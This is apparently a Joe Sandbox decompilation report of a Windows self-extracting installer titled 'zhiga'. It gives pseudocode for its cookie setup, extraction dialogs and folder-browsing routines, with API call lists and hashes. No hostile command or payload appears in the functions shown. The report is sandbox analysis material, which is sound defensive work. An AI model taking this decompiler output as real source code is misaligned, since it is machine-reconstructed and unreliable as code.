                                                          				if(__eax == __edi || (__esi & __eax) == 0) {
                                                          					GetSystemTimeAsFileTime(_t40 - 0xc);
                                                          					 *(_t40 - 4) =  *(_t40 - 8) ^  *(_t40 - 0xc);
                                                          					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentProcessId();
                                                          					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentThreadId();
                                                          					 *(_t40 - 4) = GetTickCount() ^  *(_t40 - 4) ^ _t40 - 0x00000004;
                                                          					QueryPerformanceCounter(_t40 - 0x14);
                                                          					_t32 =  *(_t40 - 0x10) ^  *(_t40 - 0x14) ^  *(_t40 - 4);
                                                          					_t35 = _t32;
                                                          					if(_t32 == _t36 || ( *0x10c8004 & _t38) == 0) {
                                                          						_t32 = 0xbb40e64f;
                                                          						_t35 = 0xbb40e64f;
                                                          					}
                                                          					 *0x10c8004 = _t35;
                                                          				}
                                                          				_t33 =  !_t32;
                                                          				 *0x10c8008 = _t33;
                                                          				return _t33;
                                                          			}










                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 010C7182
                                                          • GetCurrentProcessId.KERNEL32 ref: 010C7191
                                                          • GetCurrentThreadId.KERNEL32 ref: 010C719A
                                                          • GetTickCount.KERNEL32 ref: 010C71A3
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 010C71B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                          • String ID:
                                                          • API String ID: 1445889803-0
                                                          • Opcode ID: 05b51f402044c204c72c232ee06290cf86104c17117685c4b291898dfa30b92b
                                                          • Instruction ID: 4aa01e108f2a68efd3e2c1f71cd146095532192d55fc6abb9d4398f0b0318978
                                                          • Opcode Fuzzy Hash: 05b51f402044c204c72c232ee06290cf86104c17117685c4b291898dfa30b92b
                                                          • Instruction Fuzzy Hash: BB01C870E01208DFCB65DFB8D64859EB7F5FF88644B61499AE845E7204E7399A009F04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                          
                                                          				SetUnhandledExceptionFilter(0);
                                                          				UnhandledExceptionFilter(_a4);
                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                          			}



                                                          0x010c6cf7
                                                          0x010c6d00
                                                          0x010c6d19

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010C6E26,010C1000), ref: 010C6CF7
                                                          • UnhandledExceptionFilter.KERNEL32(010C6E26,?,010C6E26,010C1000), ref: 010C6D00
                                                          • GetCurrentProcess.KERNEL32(C0000409,?,010C6E26,010C1000), ref: 010C6D0B
                                                          • TerminateProcess.KERNEL32(00000000,?,010C6E26,010C1000), ref: 010C6D12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                          • String ID:
                                                          • API String ID: 3231755760-0
                                                          • Opcode ID: 74491d289cd8b013c2e42dabad2a0f1820547fdb2385950b5ec1fd869d26200b
                                                          • Instruction ID: 5fe4eff579892baca2c29e5fa1770b1d2dbfd3e8837245132917cf009e766aae
                                                          • Opcode Fuzzy Hash: 74491d289cd8b013c2e42dabad2a0f1820547fdb2385950b5ec1fd869d26200b
                                                          • Instruction Fuzzy Hash: 86D0C93220010CFFDB202BF1E80CA593F28EBC8292F454000FB59C3044EA3B44518F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 76%
                                                          			E010C3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* __edi;
                                                          				void* _t6;
                                                          				void* _t10;
                                                          				int _t20;
                                                          				int _t21;
                                                          				int _t23;
                                                          				char _t24;
                                                          				long _t25;
                                                          				int _t27;
                                                          				int _t30;
                                                          				void* _t32;
                                                          				int _t33;
                                                          				int _t34;
                                                          				int _t37;
                                                          				int _t38;
                                                          				int _t39;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				CHAR* _t49;
                                                          				void* _t58;
                                                          				void* _t63;
                                                          				struct HWND__* _t64;
                                                          
                                                          				_t64 = _a4;
                                                          				_t6 = _a8 - 0x10;
                                                          				if(_t6 == 0) {
                                                          					_push(0);
                                                          					L38:
                                                          					EndDialog(_t64, ??);
                                                          					L39:
                                                          					__eflags = 1;
                                                          					return 1;
                                                          				}
                                                          				_t42 = 1;
                                                          				_t10 = _t6 - 0x100;
                                                          				if(_t10 == 0) {
                                                          					E010C43D0(_t64, GetDesktopWindow());
                                                          					SetWindowTextA(_t64, "zhiga");
                                                          					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                          					__eflags =  *0x10c9a40 - _t42; // 0x3
                                                          					if(__eflags == 0) {
                                                          						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                          					}
                                                          					L36:
                                                          					return _t42;
                                                          				}
                                                          				if(_t10 == _t42) {
                                                          					_t20 = _a12 - 1;
                                                          					__eflags = _t20;
                                                          					if(_t20 == 0) {
                                                          						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10c91e4, 0x104);
                                                          						__eflags = _t21;
                                                          						if(_t21 == 0) {
                                                          							L32:
                                                          							_t58 = 0x4bf;
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0);
                                                          							L25:
                                                          							E010C44B9(_t64, _t58);
                                                          							goto L39;
                                                          						}
                                                          						_t49 = 0x10c91e4;
                                                          						do {
                                                          							_t23 =  *_t49;
                                                          							_t49 =  &(_t49[1]);
                                                          							__eflags = _t23;
                                                          						} while (_t23 != 0);
                                                          						__eflags = _t49 - 0x10c91e5 - 3;
                                                          						if(_t49 - 0x10c91e5 < 3) {
                                                          							goto L32;
                                                          						}
                                                          						_t24 =  *0x10c91e5; // 0x3a
                                                          						__eflags = _t24 - 0x3a;
                                                          						if(_t24 == 0x3a) {
                                                          							L21:
                                                          							_t25 = GetFileAttributesA(0x10c91e4);
                                                          							__eflags = _t25 - 0xffffffff;
                                                          							if(_t25 != 0xffffffff) {
                                                          								L26:
                                                          								E010C658A(0x10c91e4, 0x104, 0x10c1140);
                                                          								_t27 = E010C58C8(0x10c91e4);
                                                          								__eflags = _t27;
                                                          								if(_t27 != 0) {
                                                          									__eflags =  *0x10c91e4 - 0x5c;
                                                          									if( *0x10c91e4 != 0x5c) {
                                                          										L30:
                                                          										_t30 = E010C597D(0x10c91e4, 1, _t64, 1);
                                                          										__eflags = _t30;
                                                          										if(_t30 == 0) {
                                                          											L35:
                                                          											_t42 = 1;
                                                          											__eflags = 1;
                                                          											goto L36;
                                                          										}
                                                          										L31:
                                                          										_t42 = 1;
                                                          										EndDialog(_t64, 1);
                                                          										goto L36;
                                                          									}
                                                          									__eflags =  *0x10c91e5 - 0x5c;
                                                          									if( *0x10c91e5 == 0x5c) {
                                                          										goto L31;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_t58 = 0x4be;
                                                          								goto L25;
                                                          							}
                                                          							_t32 = E010C44B9(_t64, 0x54a, 0x10c91e4, 0, 0x20, 4);
                                                          							__eflags = _t32 - 6;
                                                          							if(_t32 != 6) {
                                                          								goto L35;
                                                          							}
                                                          							_t33 = CreateDirectoryA(0x10c91e4, 0);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								goto L26;
                                                          							}
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0x10c91e4);
                                                          							_t58 = 0x4cb;
                                                          							goto L25;
                                                          						}
                                                          						__eflags =  *0x10c91e4 - 0x5c;
                                                          						if( *0x10c91e4 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						__eflags = _t24 - 0x5c;
                                                          						if(_t24 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						goto L21;
                                                          					}
                                                          					_t34 = _t20 - 1;
                                                          					__eflags = _t34;
                                                          					if(_t34 == 0) {
                                                          						EndDialog(_t64, 0);
                                                          						 *0x10c9124 = 0x800704c7;
                                                          						goto L39;
                                                          					}
                                                          					__eflags = _t34 != 0x834;
                                                          					if(_t34 != 0x834) {
                                                          						goto L36;
                                                          					}
                                                          					_t37 = LoadStringA( *0x10c9a3c, 0x3e8, 0x10c8598, 0x200);
                                                          					__eflags = _t37;
                                                          					if(_t37 != 0) {
                                                          						_t38 = E010C4224(_t64, _t46, _t46);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10c87a0);
                                                          						__eflags = _t39;
                                                          						if(_t39 != 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t63 = 0x4c0;
                                                          						L9:
                                                          						E010C44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						goto L38;
                                                          					}
                                                          					_t63 = 0x4b1;
                                                          					goto L9;
                                                          				}
                                                          				return 0;
                                                          			}

























                                                          0x00000000
                                                          0x00000000
                                                          0x010c32be
                                                          0x010c3280
                                                          0x010c3289
                                                          0x010c328e
                                                          0x00000000
                                                          0x010c328e
                                                          0x010c327b
                                                          0x00000000
                                                          0x010c327b
                                                          0x00000000

                                                          APIs
                                                          • LoadStringA.USER32(000003E8,010C8598,00000200), ref: 010C3271
                                                          • GetDesktopWindow.USER32 ref: 010C33E2
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C33F7
                                                          • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010C3410
                                                          • GetDlgItem.USER32(?,00000836), ref: 010C3426
                                                          • EnableWindow.USER32(00000000), ref: 010C342D
                                                          • EndDialog.USER32(?,00000000), ref: 010C343F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$zhiga
                                                          • API String ID: 2418873061-1100731767
                                                          • Opcode ID: 41d6e8a13a3f246da70516abeb3a65086bcc724dac78deca60b178446781d5aa
                                                          • Instruction ID: bc2fa67891ec0a395027adfa990d2325aadd2fa1c0990f22af29c93c5677eb56
                                                          • Opcode Fuzzy Hash: 41d6e8a13a3f246da70516abeb3a65086bcc724dac78deca60b178446781d5aa
                                                          • Instruction Fuzzy Hash: 0D51E370360250BAEBB25B395C4CFBF7999BB86F54F00C02CFAC59A1C5DEA994019F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t13;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				struct HRSRC__* _t31;
                                                          				intOrPtr _t33;
                                                          				void* _t43;
                                                          				void* _t48;
                                                          				signed int _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				signed int _t67;
                                                          
                                                          				_t13 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t13 ^ _t67;
                                                          				_t65 = 0;
                                                          				_t66 = __ecx;
                                                          				_t48 = __edx;
                                                          				 *0x10c9a3c = __ecx;
                                                          				memset(0x10c9140, 0, 0x8fc);
                                                          				memset(0x10c8a20, 0, 0x32c);
                                                          				memset(0x10c88c0, 0, 0x104);
                                                          				 *0x10c93ec = 1;
                                                          				_t20 = E010C468F("TITLE", 0x10c9154, 0x7f);
                                                          				if(_t20 == 0 || _t20 > 0x80) {
                                                          					_t64 = 0x4b1;
                                                          					goto L32;
                                                          				} else {
                                                          					_t27 = CreateEventA(0, 1, 1, 0);
                                                          					 *0x10c858c = _t27;
                                                          					SetEvent(_t27);
                                                          					_t64 = 0x10c9a34;
                                                          					if(E010C468F("EXTRACTOPT", 0x10c9a34, 4) != 0) {
                                                          						if(( *0x10c9a34 & 0x000000c0) == 0) {
                                                          							L12:
                                                          							 *0x10c9120 =  *0x10c9120 & _t65;
                                                          							if(E010C5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                          								if( *0x10c8a3a == 0) {
                                                          									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                          									if(_t31 != 0) {
                                                          										_t65 = LoadResource(_t66, _t31);
                                                          									}
                                                          									if( *0x10c8184 != 0) {
                                                          										__imp__#17();
                                                          									}
                                                          									if( *0x10c8a24 == 0) {
                                                          										_t57 = _t65;
                                                          										if(E010C36EE(_t65) == 0) {
                                                          											goto L33;
                                                          										} else {
                                                          											_t33 =  *0x10c9a40; // 0x3
                                                          											_t48 = 1;
                                                          											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                          												if(( *0x10c9a34 & 0x00000100) == 0 || ( *0x10c8a38 & 0x00000001) != 0 || E010C18A3(_t64, _t66) != 0) {
                                                          													goto L30;
                                                          												} else {
                                                          													_t64 = 0x7d6;
                                                          													if(E010C6517(_t57, 0x7d6, _t34, E010C19E0, 0x547, 0x83e) != 0x83d) {
                                                          														goto L33;
                                                          													} else {
                                                          														goto L30;
                                                          													}
                                                          												}
                                                          											} else {
                                                          												L30:
                                                          												_t23 = _t48;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_t23 = 1;
                                                          									}
                                                          								} else {
                                                          									E010C2390(0x10c8a3a);
                                                          									goto L33;
                                                          								}
                                                          							} else {
                                                          								_t64 = 0x520;
                                                          								L32:
                                                          								E010C44B9(0, _t64, 0, 0, 0x10, 0);
                                                          								goto L33;
                                                          							}
                                                          						} else {
                                                          							_t64 =  &_v268;
                                                          							if(E010C468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                          								goto L3;
                                                          							} else {
                                                          								_t43 = CreateMutexA(0, 1,  &_v268);
                                                          								 *0x10c8588 = _t43;
                                                          								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                          									goto L12;
                                                          								} else {
                                                          									if(( *0x10c9a34 & 0x00000080) == 0) {
                                                          										_t64 = 0x524;
                                                          										if(E010C44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                          											goto L12;
                                                          										} else {
                                                          											goto L11;
                                                          										}
                                                          									} else {
                                                          										_t64 = 0x54b;
                                                          										E010C44B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                          										L11:
                                                          										CloseHandle( *0x10c8588);
                                                          										 *0x10c9124 = 0x800700b7;
                                                          										goto L33;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						L3:
                                                          						_t64 = 0x4b1;
                                                          						E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						 *0x10c9124 = 0x80070714;
                                                          						L33:
                                                          						_t23 = 0;
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                          			}




















                                                          APIs
                                                          • memset.MSVCRT ref: 010C2CD9
                                                          • memset.MSVCRT ref: 010C2CE9
                                                          • memset.MSVCRT ref: 010C2CF9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2D34
                                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2D40
                                                          • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2DAE
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010C2DBD
                                                          • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010C2E0A
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                          • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                          • API String ID: 1002816675-3407794480
                                                          • Opcode ID: ea1eacd231076c7758d278cc00a7844bcc15acbdeea705f5a4d8112d676d0901
                                                          • Instruction ID: d4ba119012d222fd10c3ddb144f2bfe42bfdfe3be71e94332e7881c58a002502
                                                          • Opcode Fuzzy Hash: ea1eacd231076c7758d278cc00a7844bcc15acbdeea705f5a4d8112d676d0901
                                                          • Instruction Fuzzy Hash: 2151C570340306AEF770A7299C49B7F36D9EB95F44F00806DAAC1E69C9EAB9C4418F65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			E010C34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                          				void* _t9;
                                                          				void* _t12;
                                                          				void* _t13;
                                                          				void* _t17;
                                                          				void* _t23;
                                                          				void* _t25;
                                                          				struct HWND__* _t35;
                                                          				struct HWND__* _t38;
                                                          				void* _t39;
                                                          
                                                          				_t9 = _a8 - 0x10;
                                                          				if(_t9 == 0) {
                                                          					__eflags = 1;
                                                          					L19:
                                                          					_push(0);
                                                          					 *0x10c91d8 = 1;
                                                          					L20:
                                                          					_push(_a4);
                                                          					L21:
                                                          					EndDialog();
                                                          					L22:
                                                          					return 1;
                                                          				}
                                                          				_push(1);
                                                          				_pop(1);
                                                          				_t12 = _t9 - 0xf2;
                                                          				if(_t12 == 0) {
                                                          					__eflags = _a12 - 0x1b;
                                                          					if(_a12 != 0x1b) {
                                                          						goto L22;
                                                          					}
                                                          					goto L19;
                                                          				}
                                                          				_t13 = _t12 - 0xe;
                                                          				if(_t13 == 0) {
                                                          					_t35 = _a4;
                                                          					 *0x10c8584 = _t35;
                                                          					E010C43D0(_t35, GetDesktopWindow());
                                                          					__eflags =  *0x10c8184; // 0x1
                                                          					if(__eflags != 0) {
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                          						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                          					}
                                                          					SetWindowTextA(_t35, "zhiga");
                                                          					_t17 = CreateThread(0, 0, E010C4FE0, 0, 0, 0x10c8798);
                                                          					 *0x10c879c = _t17;
                                                          					__eflags = _t17;
                                                          					if(_t17 != 0) {
                                                          						goto L22;
                                                          					} else {
                                                          						E010C44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						_push(_t35);
                                                          						goto L21;
                                                          					}
                                                          				}
                                                          				_t23 = _t13 - 1;
                                                          				if(_t23 == 0) {
                                                          					__eflags = _a12 - 2;
                                                          					if(_a12 != 2) {
                                                          						goto L22;
                                                          					}
                                                          					ResetEvent( *0x10c858c);
                                                          					_t38 =  *0x10c8584; // 0x0
                                                          					_t25 = E010C44B9(_t38, 0x4b2, 0x10c1140, 0, 0x20, 4);
                                                          					__eflags = _t25 - 6;
                                                          					if(_t25 == 6) {
                                                          						L11:
                                                          						 *0x10c91d8 = 1;
                                                          						SetEvent( *0x10c858c);
                                                          						_t39 =  *0x10c879c; // 0x0
                                                          						E010C3680(_t39);
                                                          						_push(0);
                                                          						goto L20;
                                                          					}
                                                          					__eflags = _t25 - 1;
                                                          					if(_t25 == 1) {
                                                          						goto L11;
                                                          					}
                                                          					SetEvent( *0x10c858c);
                                                          					goto L22;
                                                          				}
                                                          				if(_t23 == 0xe90) {
                                                          					TerminateThread( *0x10c879c, 0);
                                                          					EndDialog(_a4, _a12);
                                                          					return 1;
                                                          				}
                                                          				return 0;
                                                          			}













                                                          APIs
                                                          • TerminateThread.KERNEL32(00000000), ref: 010C3535
                                                          • EndDialog.USER32(?,?), ref: 010C3541
                                                          • ResetEvent.KERNEL32 ref: 010C355F
                                                          • SetEvent.KERNEL32(010C1140,00000000,00000020,00000004), ref: 010C3590
                                                          • GetDesktopWindow.USER32 ref: 010C35C7
                                                          • GetDlgItem.USER32(?,0000083B), ref: 010C35F1
                                                          • SendMessageA.USER32(00000000), ref: 010C35F8
                                                          • GetDlgItem.USER32(?,0000083B), ref: 010C3610
                                                          • SendMessageA.USER32(00000000), ref: 010C3617
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C3623
                                                          • CreateThread.KERNEL32 ref: 010C3637
                                                          • EndDialog.USER32(?,00000000), ref: 010C3671
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                          • String ID: zhiga
                                                          • API String ID: 2406144884-3705506974
                                                          • Opcode ID: d5c39190ebb41a4173f1d53cd3001b25b6bf0282d9d188659eee94f3e23abfa0
                                                          • Instruction ID: 05f13cb7070648ee35aa3a4d038e1e0db13609c6a62e7f7e088e52581358a170
                                                          • Opcode Fuzzy Hash: d5c39190ebb41a4173f1d53cd3001b25b6bf0282d9d188659eee94f3e23abfa0
                                                          • Instruction Fuzzy Hash: F1319031250215EFD7701B29AC4DE2E7EA9F7D9F45F10C51EFAC29A298DA7A8400CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E010C4224(char __ecx) {
                                                          				char* _v8;
                                                          				_Unknown_base(*)()* _v12;
                                                          				_Unknown_base(*)()* _v16;
                                                          				_Unknown_base(*)()* _v20;
                                                          				char* _v28;
                                                          				intOrPtr _v32;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				char _v44;
                                                          				char _v48;
                                                          				char _v52;
                                                          				_Unknown_base(*)()* _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				_Unknown_base(*)()* _t29;
                                                          				_Unknown_base(*)()* _t32;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				char* _t61;
                                                          				void* _t63;
                                                          				char* _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				char _t67;
                                                          				void* _t71;
                                                          				char _t76;
                                                          				intOrPtr _t85;
                                                          
                                                          				_t67 = __ecx;
                                                          				_t66 = LoadLibraryA("SHELL32.DLL");
                                                          				if(_t66 == 0) {
                                                          					_t63 = 0x4c2;
                                                          					L22:
                                                          					E010C44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                          					return 0;
                                                          				}
                                                          				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                          				_v12 = _t26;
                                                          				if(_t26 == 0) {
                                                          					L20:
                                                          					FreeLibrary(_t66);
                                                          					_t63 = 0x4c1;
                                                          					goto L22;
                                                          				}
                                                          				_t28 = GetProcAddress(_t66, 0xc3);
                                                          				_v20 = _t28;
                                                          				if(_t28 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                          				_v16 = _t29;
                                                          				if(_t29 == 0) {
                                                          					goto L20;
                                                          				}
                                                          				_t76 =  *0x10c88c0; // 0x0
                                                          				if(_t76 != 0) {
                                                          					L10:
                                                          					 *0x10c87a0 = 0;
                                                          					_v52 = _t67;
                                                          					_v48 = 0;
                                                          					_v44 = 0;
                                                          					_v40 = 0x10c8598;
                                                          					_v36 = 1;
                                                          					_v32 = E010C4200;
                                                          					_v28 = 0x10c88c0;
                                                          					 *0x10ca288( &_v52);
                                                          					_t32 =  *_v12();
                                                          					if(_t71 != _t71) {
                                                          						asm("int 0x29");
                                                          					}
                                                          					_v12 = _t32;
                                                          					if(_t32 != 0) {
                                                          						 *0x10ca288(_t32, 0x10c88c0);
                                                          						 *_v16();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						if( *0x10c88c0 != 0) {
                                                          							E010C1680(0x10c87a0, 0x104, 0x10c88c0);
                                                          						}
                                                          						 *0x10ca288(_v12);
                                                          						 *_v20();
                                                          						if(_t71 != _t71) {
                                                          							asm("int 0x29");
                                                          						}
                                                          					}
                                                          					FreeLibrary(_t66);
                                                          					_t85 =  *0x10c87a0; // 0x0
                                                          					return 0 | _t85 != 0x00000000;
                                                          				} else {
                                                          					GetTempPathA(0x104, 0x10c88c0);
                                                          					_t61 = 0x10c88c0;
                                                          					_t4 =  &(_t61[1]); // 0x10c88c1
                                                          					_t65 = _t4;
                                                          					do {
                                                          						_t42 =  *_t61;
                                                          						_t61 =  &(_t61[1]);
                                                          					} while (_t42 != 0);
                                                          					_t5 = _t61 - _t65 + 0x10c88c0; // 0x2191181
                                                          					_t44 = CharPrevA(0x10c88c0, _t5);
                                                          					_v8 = _t44;
                                                          					if( *_t44 == 0x5c &&  *(CharPrevA(0x10c88c0, _t44)) != 0x3a) {
                                                          						 *_v8 = 0;
                                                          					}
                                                          					goto L10;
                                                          				}
                                                          			}





























                                                          APIs
                                                          • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010C4236
                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010C424C
                                                          • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010C4263
                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010C427A
                                                          • GetTempPathA.KERNEL32(00000104,010C88C0,?,00000001), ref: 010C429F
                                                          • CharPrevA.USER32(010C88C0,02191181,?,00000001), ref: 010C42C2
                                                          • CharPrevA.USER32(010C88C0,00000000,?,00000001), ref: 010C42D6
